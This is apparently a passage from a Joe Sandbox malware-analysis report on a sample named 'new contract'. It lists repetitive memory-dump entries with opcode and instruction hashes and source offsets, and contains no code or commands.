                                                                                                                                                                            • Instruction Fuzzy Hash: C6014471A00209EFDB04DFA9D945A9EB7F8FF58304F50405AFA14E7350D6749D01CBA4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                                                            • Instruction ID: b877054225ef4e3350f45bcc1562641029af9934b5ce7729de936fe31b072a35
                                                                                                                                                                            • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                                                            • Instruction Fuzzy Hash: 4701D1322016899BE722971DCD09F59BF9DEF82B50F0840A9FE04CB7A1D77AC801C614
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: b627fec25eb6c257f11bb661ccd3427e14fda07872aab31bb01d22e531437400
                                                                                                                                                                            • Instruction ID: ab05798bc39431e93aed1aa5a08349eb7750dde63312b09564f159c227f0e74c
                                                                                                                                                                            • Opcode Fuzzy Hash: b627fec25eb6c257f11bb661ccd3427e14fda07872aab31bb01d22e531437400
                                                                                                                                                                            • Instruction Fuzzy Hash: EC014F71A002499BDB04DFA9D945AEEBBF8FF59310F14405EE505E7380D774EA01CB98
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                            • Instruction ID: ab26306ed7abc651caa3486531b9fbdb3f63f89b3d691d0ae7b1c26bf4fdd2a0
                                                                                                                                                                            • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                            • Instruction Fuzzy Hash: 63F01D7220001EBFEF019F94DD80DAF7B7EEB59298B144129FA1192160D635DD21ABA0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a97a19f1e511e6cac47997f9e3e7c49fcdf049b4e51916ca43bc9068e806d256
                                                                                                                                                                            • Instruction ID: 7a96578ee20f513b93201952295299f1c8610d7e4bf7d31fecfe129c23fc849b
                                                                                                                                                                            • Opcode Fuzzy Hash: a97a19f1e511e6cac47997f9e3e7c49fcdf049b4e51916ca43bc9068e806d256
                                                                                                                                                                            • Instruction Fuzzy Hash: 41018536100209ABCF229E88DC40EDA3F66FB4C664F068106FE1866220C332D971EF81
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4d5211fa5dbed6554b29c64cfdf4c556343e15259fa8762b85e5fdb01b01f988
                                                                                                                                                                            • Instruction ID: ede7ed8462e34303b96b5b381ac32028d9346f49bbb73c373df0cc580f1066d2
                                                                                                                                                                            • Opcode Fuzzy Hash: 4d5211fa5dbed6554b29c64cfdf4c556343e15259fa8762b85e5fdb01b01f988
                                                                                                                                                                            • Instruction Fuzzy Hash: 13F024712C42415BF310962D8C12F2632E6F7D4662F69842EEB058F3C5EA70DC0183A4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: dd8c275911cada6874f0d7bc4020c47943611fadd754df09e79c65f5c80e9089
                                                                                                                                                                            • Instruction ID: fa091f8a5dd776bde04385ee24cd51de919a09430703540afb45468368ef0dee
                                                                                                                                                                            • Opcode Fuzzy Hash: dd8c275911cada6874f0d7bc4020c47943611fadd754df09e79c65f5c80e9089
                                                                                                                                                                            • Instruction Fuzzy Hash: 3401AF702406819BE7669B3CCE58B2537A9BB81B48F984194BE41CBBE6DB28D842C614
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                            • Instruction ID: c1ca94ce74311bf3f10d901a67da3aed31de444ff8f4bc22200474c277e1101e
                                                                                                                                                                            • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                            • Instruction Fuzzy Hash: 26F0893574192347EB75FA2F9C30B3EAA56DFD0E51B15062C9559CB780DF60DC018794
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                                            • Instruction ID: 08d0dc6a507cf316ec65b43cebbc3d2ad2e613624d2d7dc1e1e8c8d378320bc9
                                                                                                                                                                            • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                                            • Instruction Fuzzy Hash: 35F089337515119BD3319A4DCC80F16B769EFD5A60F9B0169A6049B360C765EC02CFD0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ba071a6a2772f469a778141787e08d1b2fe150a32fc305c82af0806e5eafa3c6
                                                                                                                                                                            • Instruction ID: c55d5164d93735a7c0db3d2e8082938231a5e3a3e25c2a7cf69cf00438b71716
                                                                                                                                                                            • Opcode Fuzzy Hash: ba071a6a2772f469a778141787e08d1b2fe150a32fc305c82af0806e5eafa3c6
                                                                                                                                                                            • Instruction Fuzzy Hash: 8EF0C2716093049FC310EF28C945A1BBBE4FF99710F80465EB898DB394EA34ED01CB96
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                                            • Instruction ID: 930f54c2a66d26ae36a9dc6771e094602c0d9e0d0a97ed9938cba09b0e72e7af
                                                                                                                                                                            • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                                            • Instruction Fuzzy Hash: F9F0E972610204AFE714DF25CC01F56B7EAEF98354F258078A945D72A4FBB0ED01C654
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6c55dc9dfb0cee85491d0cce66333e7be753ecfa805c1dd8c35105e1f38a0a1e
                                                                                                                                                                            • Instruction ID: 9e82741e926c5b5e3a7a776cbd6394de223318bfe4b10f575769edde95eb3222
                                                                                                                                                                            • Opcode Fuzzy Hash: 6c55dc9dfb0cee85491d0cce66333e7be753ecfa805c1dd8c35105e1f38a0a1e
                                                                                                                                                                            • Instruction Fuzzy Hash: 22F0C270A0020DDFCB04EF69C915A9EB7B4FF18300F008059B805EB385DA38EE01CB54
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 10607765637c9d97cc29ff9bade75362de4e7cfeb0277b38819b64ecf0f38de9
                                                                                                                                                                            • Instruction ID: 698eb4e9b96ebea5e116dea2cd2ecbcfb0a2e103f1834c7b882b442aadcf041e
                                                                                                                                                                            • Opcode Fuzzy Hash: 10607765637c9d97cc29ff9bade75362de4e7cfeb0277b38819b64ecf0f38de9
                                                                                                                                                                            • Instruction Fuzzy Hash: 8CF09031926EF19FE7228B5CCC44BA27FD89B01660F0B496AD94987602CFACD880CE51
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d0853933235363aa4882fc5045dac283a1b9a6c254dd8f8b343dbe0ade3859d9
                                                                                                                                                                            • Instruction ID: 733e76ff19b44fb3b552ea1d2825c751e581446df354bc337266fc74e18b66d8
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                                            • Instruction ID: 71672e3dd4ff03d6310fdac111b6c7eaa09e0f07bb39de863a608dd33b25b281
                                                                                                                                                                            • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                                            • Instruction Fuzzy Hash: 95D05E36511A50AFD3329F1BEE00C13BBF9FBC4A10705062EA54683A20C770AC06CBA0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                            • Instruction ID: 6b39d9ed5fece23d79bc538b520984440872c2af2e3942d0866b4facff303685
                                                                                                                                                                            • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                            • Instruction Fuzzy Hash: C8D0A932214620ABDB32AA1CFC00FC333E9BB88720F06049DB008C7250C364AC81CA88
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                            • Instruction ID: 261ca165073b70a64b38ccfc00219d2c4e8ec5d45258915e882e66f3dc6c8076
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                            • Instruction Fuzzy Hash: 65E0EC359506849BDF12DF59CA40F5ABBB9BB94B40F150058E1485B760C729A901CB40
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                            • Instruction ID: 789f5f1680e15a080f92ed7b80784af8b162c92997de546153101606f2931d68
                                                                                                                                                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                            • Instruction Fuzzy Hash: 00D022322130B093CB2856956D00F636906ABC0A95F0E002C340AD3A04C1088C43C2E0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                            • Instruction ID: b74b561ed14007ae4850f22878b33bac0c054c025650e2c380f219e9374e2e5b
                                                                                                                                                                            • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                            • Instruction Fuzzy Hash: F8D012371D054DBBCB119F66DC01F957BA9E7A4BA0F444020B504875A0C63AE950D584
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8402c59f4b9b08bf17d47a4cee71184ed920c68a131fac3b0b09881a8816bcd9
                                                                                                                                                                            • Instruction ID: a404c57320229bc4e9c0831339156d6dda36f20859e8805bed6b6b2b1de2793f
                                                                                                                                                                            • Opcode Fuzzy Hash: 8402c59f4b9b08bf17d47a4cee71184ed920c68a131fac3b0b09881a8816bcd9
                                                                                                                                                                            • Instruction Fuzzy Hash: 90D092356566069BDF6ADB59CE10A6A7ABDEF64B41F4000ACEA0192620E329E8128A50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                            • Instruction ID: 60e1f7bb0ddddfb67f89f237bdc3a8b8a894f14d7ec525b15cdb0958f99f622a
                                                                                                                                                                            • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                            • Instruction Fuzzy Hash: 15D0C935212E80CFD61BCB0CC9A4F1533A8FB84B44F814490F501CBB22DB6CD944CA00
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                            • Instruction ID: 8d1713207b9afe39a1118f65207fb4f56a429ccc5e1fe7d6ad05e7a799aab82a
                                                                                                                                                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                            • Instruction Fuzzy Hash: F4C01232290648AFC712AA99CD01F027BAAEBA8B40F000021F2048B670C635E820EA88
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                            • Instruction ID: f6e9bdd7ba10a689ab23bf0b4f23373d93f1822ed7c6bc090a5f03c042bd1fc5
                                                                                                                                                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                            • Instruction Fuzzy Hash: 75D01236100249EFCB02DF41C890D9A7B2BFBD8710F108019FD19076108A31ED62DA50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                            • Instruction ID: 4ad718402088b07d1c68c5da17df28208e58b7615997ce46ff154a33ffa90369
                                                                                                                                                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                            • Instruction Fuzzy Hash: E6C04C797015418FCF15DB19D794F4577E4F754750F1518D0E805CB721E724E805CA10
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e172c4c438b62026560107f1a6eac222164adcec0cd607ffd011448312a46f51
                                                                                                                                                                            • Instruction ID: f7f97deef94f908ec4ae79470bc2e782c74a5bc3a3690f3ad69399aa2a9c5aac
                                                                                                                                                                            • Opcode Fuzzy Hash: e172c4c438b62026560107f1a6eac222164adcec0cd607ffd011448312a46f51
                                                                                                                                                                            • Instruction Fuzzy Hash: E790023160580012914075584C885474009A7E0301B55C121E4424654DCA148E565361
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: af830110bb7be53304a420d388521d7c1bdf41d7c9871420fec7eff7d7515d0c
                                                                                                                                                                            • Instruction ID: 8fa1b03d2af62e782b7278729e8f26cf32a47cc7f17137c5ce48a0972b1b01d2
                                                                                                                                                                            • Opcode Fuzzy Hash: af830110bb7be53304a420d388521d7c1bdf41d7c9871420fec7eff7d7515d0c
                                                                                                                                                                            • Instruction Fuzzy Hash: 7790026160150042414075584C084076009A7E1301395C225A4554660DC6188D559369
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: cc452bf3455871ee68dc3655075af0b004f7b57898154ac9c104b2b6e22eb915
                                                                                                                                                                            • Instruction ID: 3238d8adecb2e293899483f2b882ebbdbe8c29a1b04ed87c5a509cb3dfe011c5
                                                                                                                                                                            • Opcode Fuzzy Hash: cc452bf3455871ee68dc3655075af0b004f7b57898154ac9c104b2b6e22eb915
                                                                                                                                                                            • Instruction Fuzzy Hash: AF90023120544842D14075584808A47001997D0305F55C121A4064794ED6258E55B761
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9d3c19a870f5bfc7e3336adbad1f5683318f8e46cc164c1044bdf4d6563cb6bc
                                                                                                                                                                            • Instruction ID: 83f03ab27ceb34e8506a6d8bb7c12b88fda2fa14d41b05bfda64488891129807
                                                                                                                                                                            • Opcode Fuzzy Hash: 9d3c19a870f5bfc7e3336adbad1f5683318f8e46cc164c1044bdf4d6563cb6bc
                                                                                                                                                                            • Instruction Fuzzy Hash: 6990023160540802D15075584818747000997D0301F55C121A4024754EC7558F5577A1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c5b2c55409f5be972b2846da9632008c6a88802b4af4ec50c23641d99da3cc0c
                                                                                                                                                                            • Instruction ID: f740f227d4ccd97c60f894749862203e01d864ac7c840700ab5ac454172667af
                                                                                                                                                                            • Opcode Fuzzy Hash: c5b2c55409f5be972b2846da9632008c6a88802b4af4ec50c23641d99da3cc0c
                                                                                                                                                                            • Instruction Fuzzy Hash: 7290023120140802D10475584C08687000997D0301F55C121AA024755FD6658D917231
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0549a3e63423b6006877f54c648af8402c3525380764edd321d08bdd992a0121
                                                                                                                                                                            • Instruction ID: f5e96baa7a7fc60b6beaa8ea9678d25e1f5908b341f11ba2dcf336f4226a8815
                                                                                                                                                                            • Opcode Fuzzy Hash: 0549a3e63423b6006877f54c648af8402c3525380764edd321d08bdd992a0121
                                                                                                                                                                            • Instruction Fuzzy Hash: 2B900225221400020145B9580A0850B0449A7D6351395C125F5416690DC6218D655321
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 32e2d9ef0ac5ac6136f8cc178ba8284c5aa593340866f0031cf12e4c15a958d8
                                                                                                                                                                            • Instruction ID: ca783e9f1b678f294d46f28c7d12e69ee4bd81cb892e94d1575bbcda220e1c6e
                                                                                                                                                                            • Opcode Fuzzy Hash: 32e2d9ef0ac5ac6136f8cc178ba8284c5aa593340866f0031cf12e4c15a958d8
                                                                                                                                                                            • Instruction Fuzzy Hash: 9B9002A1201540924500B6588808B0B450997E0201B55C126E5054660DC5258D519235
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
